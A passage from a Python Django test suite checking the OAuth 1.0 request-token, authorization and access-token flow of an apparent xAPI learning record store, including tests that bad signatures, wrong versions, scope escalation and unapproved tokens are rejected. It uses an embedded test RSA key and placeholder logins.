3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8 AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54 Lw03eHTNQghS0A== -----END PRIVATE KEY-----""") self.consumer.secret = rsa_key.exportKey() self.consumer.save() param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"RSA-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = SignatureMethod_RSA_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) def test_request_token_rsa_sha1_full_workflow(self): # Create a user User.objects.create_user('mike', '[email protected]', 'dino') self.client.login(username='mike', password='dino') # Register a consumer with rsa name = "test mike client" desc = "test mike client desc" rsa_key = """-----BEGIN PRIVATE KEY----- MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d 7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+ 3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8 AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54 Lw03eHTNQghS0A== -----END PRIVATE KEY-----""" form = {"name":name, "description":desc, "rsa": True, "secret":rsa_key} my_reg_client = self.client.post(reverse(reg_client),form) self.assertEqual(my_reg_client.status_code, 200) consumer = Consumer.objects.get(name=name) self.client.logout() param = { 'scope':'all', 'consumer_name': name } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"RSA-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/token_ready\"" % (consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = SignatureMethod_RSA_SHA1() signature = signature_method.sign(oauth_request, consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) request_token = Token.objects.get(consumer=consumer) # ============= END INITIATE ============= # ============= AUTHORIZE ============= # Create authorize path, must have oauth_token param authorize_param = {'oauth_token': request_token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param)) # Try to hit auth path, made to login auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(request_token.key, auth_resp['Location']) self.client.login(username='mike', password='dino') self.assertEqual(request_token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view # Get the form, set required fields auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = request_token.key # Post data back to auth endpoint - should redirect to callback_url we set in oauth headers with request token auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 302) # Check if oauth_verifier and oauth_token are returned self.assertIn('http://example.com/token_ready?oauth_verifier=', auth_post['Location']) self.assertIn('oauth_token=', auth_post['Location']) # Get token again just to make sure request_token_after_auth = Token.objects.get(consumer=consumer) self.assertIn(request_token_after_auth.key, auth_post['Location']) self.assertEqual(request_token_after_auth.is_approved, True) # ============= END AUTHORIZE ============= # ============= ACCESS TOKEN ============= # Set verifier in access_token params and create new oauth request oauth_header_access_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"RSA-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"%s\","\ "oauth_version=\"1.0\","\ "oauth_verifier=\"%s\"" % (consumer.key, request_token_after_auth.key, str(int(time.time())), "access_nonce", request_token_after_auth.verifier) # from_token_and_callback takes a dictionary param_list = oauth_header_access_token_params.split(",") oauth_header_access_params_dict = {} for p in param_list: item = p.split("=") oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_access_params_dict['OAuth realm'] oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET', http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict) # Create signature and add it to the headers signature_method = SignatureMethod_RSA_SHA1() signature = signature_method.sign(oauth_request, consumer, request_token_after_auth) oauth_header_access_token_params += ',oauth_signature="%s"' % signature # Get access token access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params) self.assertEqual(access_resp.status_code, 200) content = access_resp.content.split('&') access_token_secret = content[0].split('=')[1] access_token_key = content[1].split('=')[1] access_token = Token.objects.get(secret=urllib.unquote_plus(access_token_secret), key=access_token_key) # ============= END ACCESS TOKEN ============= # Set oauth headers user will use when hitting xapi endpoing and access token oauth_header_resource_params = "OAuth realm=\"test\", "\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"RSA-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"%s\","\ "oauth_version=\"1.0\"" % (consumer.key, access_token.key, str(int(time.time())), "resource_nonce") # from_token_and_callback takes a dictionary param_list = oauth_header_resource_params.split(",") oauth_header_resource_params_dict = {} for p in param_list: item = p.split("=") oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_resource_params_dict['OAuth realm'] path = TEST_SERVER + "/XAPI/statements" oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET', http_url=path, parameters=oauth_header_resource_params_dict) # Create signature and add it to the headers signature_method = SignatureMethod_RSA_SHA1() signature = signature_method.sign(oauth_request, consumer, access_token) oauth_header_resource_params += ',oauth_signature="%s"' % signature resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0") self.assertEqual(resp.status_code, 200) def test_request_token_rsa_sha1_wrong_key(self): rsa_key = RSA.importKey("""-----BEGIN PRIVATE KEY----- MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d 7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+ 3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8 AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54 Lw03eHTNQghS0A== -----END PRIVATE KEY-----""") self.consumer.secret = rsa_key.exportKey() self.consumer.save() param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"RSA-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # create signature and add it to the header params oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % "badsignature" request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 400) def test_request_token_wrong_oauth_version(self): param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in - wrong oauth_version oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.1\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_PLAINTEXT() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 400) def test_request_token_wrong_signature(self): param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.1\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # create signature and add it to the header params - adding wrong signature oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % "wrongsignature" request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 400) self.assertEqual(request_resp.content, 'Could not verify OAuth request.') def test_auth_correct(self): param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_PLAINTEXT() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) token = Token.objects.get(consumer=self.consumer) # =================================================== # Test AUTHORIZE param = {'oauth_token': token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param)) auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(token.key, auth_resp['Location']) self.client.login(username='jane', password='toto') self.assertEqual(token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = token.key auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 302) # Check if oauth_verifier and oauth_token are returned self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location']) self.assertIn('oauth_token=', auth_post['Location']) access_token = Token.objects.get(consumer=self.consumer) self.assertIn(access_token.key, auth_post['Location']) self.assertEqual(access_token.is_approved, True) def test_auth_scope_up(self): param = { 'scope':'statements/read', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_PLAINTEXT() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) token = Token.objects.get(consumer=self.consumer) # ================================================= # Test AUTHORIZE param = {'oauth_token': token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param)) auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(token.key, auth_resp['Location']) self.client.login(username='jane', password='toto') self.assertEqual(token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view # Increase power of scope here - not allowed auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = token.key data['scopes'] = ['all'] auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 401) self.assertEqual(auth_post.content, 'Action not allowed.') def test_auth_wrong_auth(self): param = { 'scope':'statements/read', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_PLAINTEXT() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) token = Token.objects.get(consumer=self.consumer) # ================================================= # Test AUTHORIZE param = {'oauth_token': token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param)) auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(token.key, auth_resp['Location']) # Login with wrong user the client is associated with self.client.login(username='dick', password='lassie') self.assertEqual(token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 403) # Show return/display OAuth authorized view self.assertEqual(auth_resp.content, 'Invalid user for this client.') def test_auth_no_scope_chosen(self): param = { 'scope':'statements/read', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_PLAINTEXT() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) token = Token.objects.get(consumer=self.consumer) # ================================================= # Test AUTHORIZE param = {'oauth_token': token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param)) auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(token.key, auth_resp['Location']) self.client.login(username='jane', password='toto') self.assertEqual(token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view # User must select at least one scope auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = token.key data['scopes'] = [] auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 401) self.assertEqual(auth_post.content, 'Action not allowed.') def test_access_token_invalid_token(self): param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_PLAINTEXT() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) token = Token.objects.get(consumer=self.consumer) # ================================================== # Test AUTHORIZE param = {'oauth_token': token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param)) auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(token.key, auth_resp['Location']) self.client.login(username='jane', password='toto') self.assertEqual(token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = token.key auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 302) # Check if oauth_verifier and oauth_token are returned self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location']) self.assertIn('oauth_token=', auth_post['Location']) access_token = Token.objects.get(consumer=self.consumer) self.assertIn(access_token.key, auth_post['Location']) self.assertEqual(access_token.is_approved, True) # Set is approved false for the token access_token.is_approved = False access_token.save() # Test ACCESS TOKEN oauth_header_access_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_signature=\"%s&%s\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"accessnonce\","\ "oauth_version=\"1.0\","\ "oauth_verifier=\"%s\"" % (self.consumer.key,token.key,self.consumer.secret,token.secret,str(int(time.time())),token.verifier) access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_params) self.assertEqual(access_resp.status_code, 401) self.assertEqual(access_resp.content, "Request Token not approved by the user.") def test_access_token_access_resources(self): param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"12345678\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_PLAINTEXT() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) token = Token.objects.get(consumer=self.consumer) # ========================================================= # Test AUTHORIZE param = {'oauth_token': token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param)) auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(token.key, auth_resp['Location']) self.client.login(username='jane', password='toto') self.assertEqual(token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = token.key auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 302) # Check if oauth_verifier and oauth_token are returned self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location']) self.assertIn('oauth_token=', auth_post['Location']) request_token = Token.objects.get(consumer=self.consumer) self.assertIn(request_token.key, auth_post['Location']) self.assertEqual(request_token.is_approved, True) # =========================================================== # Test ACCESS TOKEN oauth_header_access_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ 